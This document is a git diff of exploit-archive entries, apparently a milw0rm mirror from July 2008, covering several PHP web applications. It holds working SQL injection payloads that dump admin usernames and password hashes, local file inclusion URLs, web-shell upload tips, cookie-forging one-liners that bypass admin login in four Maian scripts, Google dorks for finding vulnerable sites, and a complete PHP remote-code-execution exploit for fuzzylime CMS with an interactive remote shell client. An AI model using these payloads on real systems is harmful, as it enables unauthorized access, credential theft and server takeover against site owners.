--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -NOTE/TIP: - -1 Week Off & I Be Back :D ;) - -Admin Login Is At /admin/ - -U Can Upload Your Shell When U Login Successfully -From This Link: www.site.com/admin/index.php?menu=uploads -& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php - --=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -Exploit: - - www.[target].com/Script/index.php?module=[LFI] - - ---==+================================================================================+==-- ---==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- ---==+================================================================================+==-- - -# milw0rm.com [2008-07-12] +--==+================================================================================+==-- +--==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- 
+--==+================================================================================+==-- + +-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=- + +AUTHOR: S.W.A.T. + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- + +Download: http://www.sclek.com/jsite.zip + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +DORK (google): "Powered by jSite 1.0 OE" + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +DESCRIPTION: +You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;) + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +EXPLOITS: +www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws + +(0x3a,user,pass),admin/**/from/**/jsite_users/* + +-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +NOTE/TIP: + +1 Week Off & I Be Back :D ;) + +Admin Login Is At /admin/ + +U Can Upload Your Shell When U Login Successfully +From This Link: www.site.com/admin/index.php?menu=uploads +& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php + +-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +Exploit: + + www.[target].com/Script/index.php?module=[LFI] + + +--==+================================================================================+==-- +--==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- +--==+================================================================================+==-- + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6058.txt b/platforms/php/webapps/6058.txt index aa5f25cf4..b1c419c1a 100755 --- a/platforms/php/webapps/6058.txt +++ b/platforms/php/webapps/6058.txt 
@@ -1,54 +1,54 @@ -==================================================================== - Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability -==================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 12 July 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : Avlc Forum - VERSION : N/A - VENDOR : N/A - DOWNLOAD : http://www.easy-script.com/compt.php?id=2147 -##################################################### - --- Remote SQL Injection --- - ---------------------------------- - Vulnerable File [vlc_forum.php] ---------------------------------- - -@Line - - 141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id"; - 142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'
    ' . mysql_error()); - - -------------- - POC Exploit -------------- - -[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user-- - - -##################################################################### - Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos - Special Thx : asylu3, str0ke, citec.us, milw0rm.com -##################################################################### - -# milw0rm.com [2008-07-12] +==================================================================== + Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability +==================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 12 July 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : Avlc Forum + VERSION : N/A + VENDOR : N/A + DOWNLOAD : http://www.easy-script.com/compt.php?id=2147 +##################################################### + +-- Remote SQL Injection --- + +--------------------------------- + Vulnerable File [vlc_forum.php] +--------------------------------- + +@Line + + 141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id"; + 142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'
    ' . mysql_error()); + + +------------- + POC Exploit +------------- + +[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user-- + + +##################################################################### + Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos + Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6060.php b/platforms/php/webapps/6060.php index 54d0b88aa..c3b1ff413 100755 --- a/platforms/php/webapps/6060.php +++ b/platforms/php/webapps/6060.php 
@@ -1,444 +1,444 @@ - -## -## Conditions: None -## -## Greetz: Inphex, hEEGy and austeN -## -## Explanations -## ************ -## -## Ok, so today we will go for a walk in the fuzzylime cms maze ... -## Finding vulns was easy, but finding a no condition vuln was quite -## harder ... -## -## First, we look to the code/content.php file: -## -##---[code/content.php]------------------------------------------ -## 02| require_once("code/functions.php"); -## --| [...] -## 09| $countfile = "code/counter/${s}_$p.inc.php"; -## 10| if(file_exists($countfile)) { -## 11| $curcount = loadfile($countfile); -## 12| } -## 13| $curcount++; -## 14| if($handle = @fopen($countfile, 'w')) { // Open the file for saving -## 15| fputs($handle, $curcount); -## 16| fclose($handle); -## 17| } -##---------------------------------------------------------------- -## -## $s, $p, $curcount vars are not initialized, so we can set it if -## register_globals=On. -## -## POC: http://[url]/code/content.php?s=owned&p=owned&curcount=[PHP_SCRIPT] -## -## Note: [C:\]# php -r "$var='abc'; $var++; print $var;" -## abd -## So the ++ just increment the last string letter position in the alphabet -## a->b, b->c, etc. -## -## Ok, we got remote code exec ... but wait a minute ... no ! require_once() -## requires a file in the code folder, but we are already in this folder ... -## PHP will die (Fatal Error) and our evil code won't be executed. -## And we wanted a no condition exploit, but this vuln needs register_globals -## to be On ... -## -## hum... let's look at other pages: we can find that extract() function is -## pretty often used, and it can simulate register_globals ... -## Now we are looking for a file which uses extract() and which can include -## code/content.php file, and which is in the root path. 
-## -## And we finally found commsrss.php, which contains: -## -##---[commsrss.php]----------------------------------------------- -## 17| extract($HTTP_POST_VARS); -## 18| extract($_POST); -## 19| extract($HTTP_GET_VARS); -## 20| extract($_GET); -## 21| extract($HTTP_COOKIE_VARS); -## 22| extract($_COOKIE); -## --| [...] -## 64| $dir = "blogs/comments/"; -## 65| if($dlist = opendir($dir)) { -## 66| while (($file = readdir($dlist)) !== false) { -## 67| if(strstr($file, $p)) { -## 68| $files[] = $file; -## 69| } -## 70| } -## 71| closedir($dlist); -## 72| } -## 73| for($i = 0; $i < count($files); $i++) { -## 74| include "blogs/comments/$files[$i]"; -## --| [...] -## 89| } -##---------------------------------------------------------------- -## -## w00t ! $files array is not initialized ... we can include every -## file we want. -## -## Using chr() we can bypass magic_quotes_gpc=Off [ see chrit() ] -## -## Our problems are solved, we have a Remote Code Execution without -## conditions. -## -## Proof of Concept -## **************** -## -## [C:\]# php exploit.php http://www.target.com/ -## [target][cmd]# ls -## blogs_.inc.php -## content_index.inc.php -## content_index.php.inc.php -## content_test.inc.php -## front_index.inc.php -## front_test.inc.php -## index.htm -## index.php_index.inc.php -## -## [target][cmd]# exit -## -## [C:\]# - -$url = $argv[1]; - - -$php_code = ''; - -$php_code--; // 13| $curcount++; - -$c0de = $url . 'commsrss.php?s=blogs&m=&usecache=0&files[0]=../../code/content.php' - . '&curcount=' . urlencode($php_code); - -$shell = $url . 'code/counter/blogs_.inc.php'; - - -# Be careful: we can create a valid shell only ONCE. -# So check if it does not already exist before doing -# anything else. 
-if(status_404($shell)==true) - get($c0de); - -$phpR = new phpreter($shell, '-:-:-(.*)-:-:-', 'cmd', array(), false); - -function chrit($str) -{ - $r = ''; - - for($i=0;$i - * VERSION: 1.0 - * LICENSE: GNU General Public License - * - * This is a really simple class with permits to exec SQL, PHP or CMD - * on a remote host using the HTTP "Shell" header. - * - * - * Sample code: - * [host][sql]# mode=cmd - * [host][cmd]# id - * uid=2176(u47170584) gid=600(ftpusers) - * - * [host][cmd]# mode=php - * [host][php]# echo phpversion(); - * 4.4.8 - * [host][php]# mode=sql - * [host][sql]# SELECT version(), user() - * -------------------------------------------------- - * version() | 5.0.51a-log - * user() | dbo225004932@74.208.16.148 - * -------------------------------------------------- - * - * [host][sql]# - * - */ - -class phpreter -{ - var $url; - var $host; - var $port; - var $page; - - var $mode; - - var $ssql; - - var $prompt; - var $phost; - - var $regex; - var $data; - - /** - * __construct() - * - * @param url The url of the remote shell. - * @param regexp The regex to catch cmd result. - * @param mode Mode: php, sql or cmd. - * @param sql An array with the file to include, - * and sql vars - * @param clear Determines if clear() is called - * on startup - */ - function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) - { - $this->url = $url; - - $this->regex = '#'.$regexp.'#is'; - - # - # Set data - # - - $infos = parse_url($this->url); - $this->host = $infos['host']; - $this->port = isset($infos['port']) ? $infos['port'] : 80; - $this->page = $infos['path']; - unset($infos); - - # www.(site).com - $host_tmp = explode('.',$this->host); - $this->phost = $host_tmp[ count($host_tmp)-2 ]; - unset($host_tmp); - - # - # Set up MySQL connection string - # - if(!sizeof($sql)) - $this->ssql = ''; - elseif(sizeof($sql)==5) - { - $this->ssql = "include('$sql[0]');" - . "mysql_connect($sql[1], $sql[2], $sql[3]);" - . 
"mysql_select_db($sql[4]);"; - } - else - { - $this->ssql = "" - . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" - . "mysql_select_db('$sql[3]');"; - } - - $this->setmode($mode); - - # - # Main Loop - # - - if($clear) $this->clear(); - print $this->prompt; - - while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) - { - # change mode - if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) - $this->setmode($array[3]); - - # clear data - elseif(preg_match('#^clear$#i',$cmd)) - $this->clear(); - - # else - else print $this->exec($cmd); - - print $this->prompt; - } - } - - /** - * clear() - * Just clears ouput, printing '\n'x50 - */ - function clear() - { - print str_repeat("\n", 50); - return 0; - } - - /** - * setmode() - * Set mode (PHP, CMD, SQL) - * You don't have to call it. - * use mode=[php|cmd|sql] instead, - * in the prompt. - */ - function setmode($newmode) - { - $this->mode = strtolower($newmode); - $this->prompt = '['.$this->phost.']['.$this->mode.']# '; - - switch($this->mode) - { - case 'cmd': - $this->data = 'system(\'\');'; - break; - case 'php': - $this->data = ''; - break; - case 'sql': - $this->data = $this->ssql - . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");' - . 'print str_repeat("-",50)."\n";' - . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' - . '{' - . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' - . 'print str_repeat("-",50)."\n";' - . '}'; - break; - } - return $this->mode; - } - - /** - * exec() - * Execute any query and catch the result. - * You don't have to call it. - */ - function exec($cmd) - { - if(!strlen($this->data)) $shell = $cmd; - else $shell = str_replace('', addslashes($cmd), $this->data); - - $fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30); - - $req = "GET " . $this->page . " HTTP/1.1\r\n"; - $req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . 
"\r\n"; - $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; - $req .= "Shell: $shell\r\n"; - $req .= "Connection: close\r\n\r\n"; - - unset($shell); - - fputs($fp, $req); - - $content = ''; - while(!feof($fp)) $content .= fgets($fp, 128); - - fclose($fp); - - # Remove headers - $data = explode("\r\n\r\n", $content); - $headers = array_shift($data); - $content = implode("\r\n\r\n", $data); - - if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) - $content = $this->unchunk($content); - - preg_match($this->regex, $content, $data); - - if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; - - return $data[1]; - } - - /** - * unchunk() - * This function aims to remove chunked content sizes which - * are putted by apache server when it uses chunked - * transfert-encoding. - */ - function unchunk($data) - { - $dsize = 1; - $offset = 0; - - while($dsize>0) - { - $hsize_size = strpos($data, "\r\n", $offset) - $offset; - - $dsize = hexdec(substr($data, $offset, $hsize_size)); - - # Remove $hsize\r\n from $data - $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); - - $offset += $dsize; - - # Remove the \r\n before the next $hsize - $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); - } - - return $data; - } -} - -?> - -# milw0rm.com [2008-07-13] + +## +## Conditions: None +## +## Greetz: Inphex, hEEGy and austeN +## +## Explanations +## ************ +## +## Ok, so today we will go for a walk in the fuzzylime cms maze ... +## Finding vulns was easy, but finding a no condition vuln was quite +## harder ... +## +## First, we look to the code/content.php file: +## +##---[code/content.php]------------------------------------------ +## 02| require_once("code/functions.php"); +## --| [...] 
+## 09| $countfile = "code/counter/${s}_$p.inc.php"; +## 10| if(file_exists($countfile)) { +## 11| $curcount = loadfile($countfile); +## 12| } +## 13| $curcount++; +## 14| if($handle = @fopen($countfile, 'w')) { // Open the file for saving +## 15| fputs($handle, $curcount); +## 16| fclose($handle); +## 17| } +##---------------------------------------------------------------- +## +## $s, $p, $curcount vars are not initialized, so we can set it if +## register_globals=On. +## +## POC: http://[url]/code/content.php?s=owned&p=owned&curcount=[PHP_SCRIPT] +## +## Note: [C:\]# php -r "$var='abc'; $var++; print $var;" +## abd +## So the ++ just increment the last string letter position in the alphabet +## a->b, b->c, etc. +## +## Ok, we got remote code exec ... but wait a minute ... no ! require_once() +## requires a file in the code folder, but we are already in this folder ... +## PHP will die (Fatal Error) and our evil code won't be executed. +## And we wanted a no condition exploit, but this vuln needs register_globals +## to be On ... +## +## hum... let's look at other pages: we can find that extract() function is +## pretty often used, and it can simulate register_globals ... +## Now we are looking for a file which uses extract() and which can include +## code/content.php file, and which is in the root path. +## +## And we finally found commsrss.php, which contains: +## +##---[commsrss.php]----------------------------------------------- +## 17| extract($HTTP_POST_VARS); +## 18| extract($_POST); +## 19| extract($HTTP_GET_VARS); +## 20| extract($_GET); +## 21| extract($HTTP_COOKIE_VARS); +## 22| extract($_COOKIE); +## --| [...] +## 64| $dir = "blogs/comments/"; +## 65| if($dlist = opendir($dir)) { +## 66| while (($file = readdir($dlist)) !== false) { +## 67| if(strstr($file, $p)) { +## 68| $files[] = $file; +## 69| } +## 70| } +## 71| closedir($dlist); +## 72| } +## 73| for($i = 0; $i < count($files); $i++) { +## 74| include "blogs/comments/$files[$i]"; +## --| [...] 
+## 89| } +##---------------------------------------------------------------- +## +## w00t ! $files array is not initialized ... we can include every +## file we want. +## +## Using chr() we can bypass magic_quotes_gpc=Off [ see chrit() ] +## +## Our problems are solved, we have a Remote Code Execution without +## conditions. +## +## Proof of Concept +## **************** +## +## [C:\]# php exploit.php http://www.target.com/ +## [target][cmd]# ls +## blogs_.inc.php +## content_index.inc.php +## content_index.php.inc.php +## content_test.inc.php +## front_index.inc.php +## front_test.inc.php +## index.htm +## index.php_index.inc.php +## +## [target][cmd]# exit +## +## [C:\]# + +$url = $argv[1]; + + +$php_code = ''; + +$php_code--; // 13| $curcount++; + +$c0de = $url . 'commsrss.php?s=blogs&m=&usecache=0&files[0]=../../code/content.php' + . '&curcount=' . urlencode($php_code); + +$shell = $url . 'code/counter/blogs_.inc.php'; + + +# Be careful: we can create a valid shell only ONCE. +# So check if it does not already exist before doing +# anything else. +if(status_404($shell)==true) + get($c0de); + +$phpR = new phpreter($shell, '-:-:-(.*)-:-:-', 'cmd', array(), false); + +function chrit($str) +{ + $r = ''; + + for($i=0;$i + * VERSION: 1.0 + * LICENSE: GNU General Public License + * + * This is a really simple class with permits to exec SQL, PHP or CMD + * on a remote host using the HTTP "Shell" header. 
+ * + * + * Sample code: + * [host][sql]# mode=cmd + * [host][cmd]# id + * uid=2176(u47170584) gid=600(ftpusers) + * + * [host][cmd]# mode=php + * [host][php]# echo phpversion(); + * 4.4.8 + * [host][php]# mode=sql + * [host][sql]# SELECT version(), user() + * -------------------------------------------------- + * version() | 5.0.51a-log + * user() | dbo225004932@74.208.16.148 + * -------------------------------------------------- + * + * [host][sql]# + * + */ + +class phpreter +{ + var $url; + var $host; + var $port; + var $page; + + var $mode; + + var $ssql; + + var $prompt; + var $phost; + + var $regex; + var $data; + + /** + * __construct() + * + * @param url The url of the remote shell. + * @param regexp The regex to catch cmd result. + * @param mode Mode: php, sql or cmd. + * @param sql An array with the file to include, + * and sql vars + * @param clear Determines if clear() is called + * on startup + */ + function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) + { + $this->url = $url; + + $this->regex = '#'.$regexp.'#is'; + + # + # Set data + # + + $infos = parse_url($this->url); + $this->host = $infos['host']; + $this->port = isset($infos['port']) ? $infos['port'] : 80; + $this->page = $infos['path']; + unset($infos); + + # www.(site).com + $host_tmp = explode('.',$this->host); + $this->phost = $host_tmp[ count($host_tmp)-2 ]; + unset($host_tmp); + + # + # Set up MySQL connection string + # + if(!sizeof($sql)) + $this->ssql = ''; + elseif(sizeof($sql)==5) + { + $this->ssql = "include('$sql[0]');" + . "mysql_connect($sql[1], $sql[2], $sql[3]);" + . "mysql_select_db($sql[4]);"; + } + else + { + $this->ssql = "" + . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" + . 
"mysql_select_db('$sql[3]');"; + } + + $this->setmode($mode); + + # + # Main Loop + # + + if($clear) $this->clear(); + print $this->prompt; + + while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) + { + # change mode + if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) + $this->setmode($array[3]); + + # clear data + elseif(preg_match('#^clear$#i',$cmd)) + $this->clear(); + + # else + else print $this->exec($cmd); + + print $this->prompt; + } + } + + /** + * clear() + * Just clears ouput, printing '\n'x50 + */ + function clear() + { + print str_repeat("\n", 50); + return 0; + } + + /** + * setmode() + * Set mode (PHP, CMD, SQL) + * You don't have to call it. + * use mode=[php|cmd|sql] instead, + * in the prompt. + */ + function setmode($newmode) + { + $this->mode = strtolower($newmode); + $this->prompt = '['.$this->phost.']['.$this->mode.']# '; + + switch($this->mode) + { + case 'cmd': + $this->data = 'system(\'\');'; + break; + case 'php': + $this->data = ''; + break; + case 'sql': + $this->data = $this->ssql + . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");' + . 'print str_repeat("-",50)."\n";' + . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' + . '{' + . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' + . 'print str_repeat("-",50)."\n";' + . '}'; + break; + } + return $this->mode; + } + + /** + * exec() + * Execute any query and catch the result. + * You don't have to call it. + */ + function exec($cmd) + { + if(!strlen($this->data)) $shell = $cmd; + else $shell = str_replace('', addslashes($cmd), $this->data); + + $fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30); + + $req = "GET " . $this->page . " HTTP/1.1\r\n"; + $req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . 
"\r\n"; + $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; + $req .= "Shell: $shell\r\n"; + $req .= "Connection: close\r\n\r\n"; + + unset($shell); + + fputs($fp, $req); + + $content = ''; + while(!feof($fp)) $content .= fgets($fp, 128); + + fclose($fp); + + # Remove headers + $data = explode("\r\n\r\n", $content); + $headers = array_shift($data); + $content = implode("\r\n\r\n", $data); + + if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) + $content = $this->unchunk($content); + + preg_match($this->regex, $content, $data); + + if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; + + return $data[1]; + } + + /** + * unchunk() + * This function aims to remove chunked content sizes which + * are putted by apache server when it uses chunked + * transfert-encoding. + */ + function unchunk($data) + { + $dsize = 1; + $offset = 0; + + while($dsize>0) + { + $hsize_size = strpos($data, "\r\n", $offset) - $offset; + + $dsize = hexdec(substr($data, $offset, $hsize_size)); + + # Remove $hsize\r\n from $data + $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); + + $offset += $dsize; + + # Remove the \r\n before the next $hsize + $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); + } + + return $data; + } +} + +?> + +# milw0rm.com [2008-07-13] diff --git a/platforms/php/webapps/6061.txt b/platforms/php/webapps/6061.txt index b8b7e83cd..516aae286 100755 --- a/platforms/php/webapps/6061.txt +++ b/platforms/php/webapps/6061.txt 
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+ Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by Maian Guestbook v3.2
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
-
-cookie exists.
- and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
- javascript:document.cookie = "gbook_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
- after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+ Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by Maian Guestbook v3.2
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the
+
+cookie exists.
+ and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+ javascript:document.cookie = "gbook_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+ after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6062.txt b/platforms/php/webapps/6062.txt
index 61edf3674..cb9c7af3a 100755
--- a/platforms/php/webapps/6062.txt
+++ b/platforms/php/webapps/6062.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Links v3.1
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Maian Links suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
- and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
- javascript:document.cookie = "links_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
- after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Links v3.1
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Maian Links suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+ and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+ javascript:document.cookie = "links_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+ after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Maian Links <= v3.1 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6063.txt b/platforms/php/webapps/6063.txt
index 82628801a..ceaee91e3 100755
--- a/platforms/php/webapps/6063.txt
+++ b/platforms/php/webapps/6063.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+ Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by: Maian Recipe v1.2
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
- and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
- javascript:document.cookie = "recipe_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
- after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+ Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
+[*] DORK: Powered by: Maian Recipe v1.2
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie
+
+exists.
+ and not the content. so we can easyily craft a cookie and look like a admin.
+
+
+
+[*] Vulnerability:
+
+ javascript:document.cookie = "recipe_cookie=1; path=/";
+
+
+[*] NOTE/TIP:
+
+ after running the javascript, visit "/admin/index.php" to view admin area.
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-13]
diff --git a/platforms/php/webapps/6064.txt b/platforms/php/webapps/6064.txt
index 3829acc48..82d1f2ed3 100755
--- a/platforms/php/webapps/6064.txt
+++ b/platforms/php/webapps/6064.txt
@@ -1,42 +1,42 @@
--[*]+================================================================================+[*]-
--[*]+ Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: S.W.A.T.
-[*] E-Mail: svvateam[at]yahoo[dot]com
-[*] Script Download: http://www.maianscriptworld.co.uk
-[*] DORK: Powered by Maian Weblog v4.0
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie
-
-exists.
- and not the content. so we can easyily craft a cookie and look like a admin.
-
-
-
-[*] Vulnerability:
-
- javascript:document.cookie = "weblog_cookie=1; path=/";
-
-
-[*] NOTE/TIP:
-
- after running the javascript, visit "/admin/index.php" to view admin area.
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-13]
+-[*]+================================================================================+[*]-
+-[*]+ Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: S.W.A.T.
+[*] E-Mail: svvateam[at]yahoo[dot]com
+[*] Script Download: http://www.maianscriptworld.co.uk
